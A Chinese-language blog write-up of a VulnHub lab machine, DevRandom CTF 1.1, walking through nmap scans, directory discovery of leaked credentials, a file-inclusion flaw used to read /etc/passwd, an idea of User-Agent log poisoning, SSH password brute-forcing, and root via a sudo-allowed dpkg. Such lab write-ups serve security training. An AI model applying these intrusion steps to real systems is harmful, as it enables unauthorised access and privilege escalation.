DevRandom CTF_1.1 靶机

DevRandom CTF_1.1 靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.137                      
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 21:50 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:4F:E8:0F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.13 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.137                    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 21:50 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00042s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 83:e5:a1:51:b1:f6:98:d3:19:e7:59:10:f7:f4:e8:5e (RSA)
|   256 b2:a6:79:c3:ad:2f:ba:cc:02:b3:42:0d:a2:a3:9e:60 (ECDSA)
|_  256 ec:1f:d4:29:9f:a5:ae:ca:93:f4:a8:6b:fd:61:44:45 (ED25519)
80/tcp open  http    Apache httpd
| http-robots.txt: 3 disallowed entries 
|_/wp-admin/ /wp-login.php /?include=info
|_http-server-header: Apache
|_http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:4F:E8:0F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ sudo nmap --script=vuln -p22,80 192.168.56.137             
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 21:55 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00062s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn\t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /log.php: Logs
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2 
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|_  /secret/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:4F:E8:0F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 37.88 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.137   
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 22:49 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00042s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 08:00:27:4F:E8:0F (Oracle VirtualBox virtual NIC)

暴露面很窄,感觉只有目录爆破可以再尝试一下(废话,除了目录爆破也没别的突破点了)

目录爆破

目录爆破来一遍,gobuster 和 dirsearch 都试一下

1
dirsearch -u http://192.168.56.137/

汇总一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/secret/
	/arizona
		API:4395874598yt3r9iy98r7r90t87treterrrrr
	/wrap
		john:Password123

/robots.txt
	/?include=info

/log.php
	记录了访问信息包含用户的访问路径和User-Agent

/secret.php
	API:341290e945c081fc3c8e2c8f2b7294ca

我尝试了使用上述用户名和密码登录,失败;尝试使用 API 的值作为密码登录,失败;最后通过 fuzz 来对 /?include=info 进行尝试,发现存在文件包含漏洞

文件包含漏洞

尝试读取 passwd 文件

得到了几个用户名,从 Web 中再没有找到别的攻击路径(实际上是我没想到,不过另一个攻击路径实际使用有点问题)

尝试了读取一些敏感文件,包括 shadow 文件、家目录下的历史文件、ssh 私钥文件,均失败,还尝试了访问 wp-config.php 文件,同样失败(失败指无回显)

接下来尝试了 ssh 爆破,但是爆破时间实在太长了,陷入了深深的自我怀疑,又去看了眼 WP,原来真的需要跑那么久。实测使用收集到的多个用户名作为用户名字典,rockyou 作为爆破密码字典,爆破时长远大于 4h

没这么大耐心,去 WP 看看有没有别的思路。其中有一篇博客提到:log.php 中存储了用户可控的 User-Agent 字段,可以写入一句话木马来实现 getshell,实测遇到了以下问题

原本 log.php 回显的日志,被存储到了 access.log 而且文件包含漏洞还无法反弹 shell

ssh 爆破

又只能回到爆破的思路中,直接看了别人的爆破结果 qwertyuiop[]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ ssh trevor@192.168.56.137
trevor@192.168.56.137\'s password: 
Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Mar 23 17:54:37 2020
trevor@lucifer:~$ whoami
trevor
trevor@lucifer:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:4f:e8:0f brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.137/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 454sec preferred_lft 454sec
    inet6 fe80::a00:27ff:fe4f:e80f/64 scope link 
       valid_lft forever preferred_lft forever
trevor@lucifer:~$ id
uid=1005(trevor) gid=1005(trevor) groups=1005(trevor)
trevor@lucifer:~$ sudo -l
Matching Defaults entries for trevor on lucifer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User trevor may run the following commands on lucifer:
    (root) NOPASSWD: /usr/bin/dpkg

提权

sudo -l 给了无需密码可执行的 dpkg 命令,在 gtfobins 中找到了利用手法

1
2
3
4
5
6
7
8
9
root@lucifer:/home/trevor# whoami
root
root@lucifer:/home/trevor# cd /root
root@lucifer:~# ls
flag.txt
root@lucifer:~# cat flag.txt
WELl DONE

echo "THISISTHEFLAGTHISISTHEFLAG\!\!\!\@\@\@###" | base64 > thisistheflag.txt

结束战斗

knowledge_database > vulnhub
DevRandom CTF_1.1 靶机
https://i3eg1nner.github.io/2023/08/ddeff39afd9a.html
作者
I3eg1nner
发布于
2023年8月31日
许可协议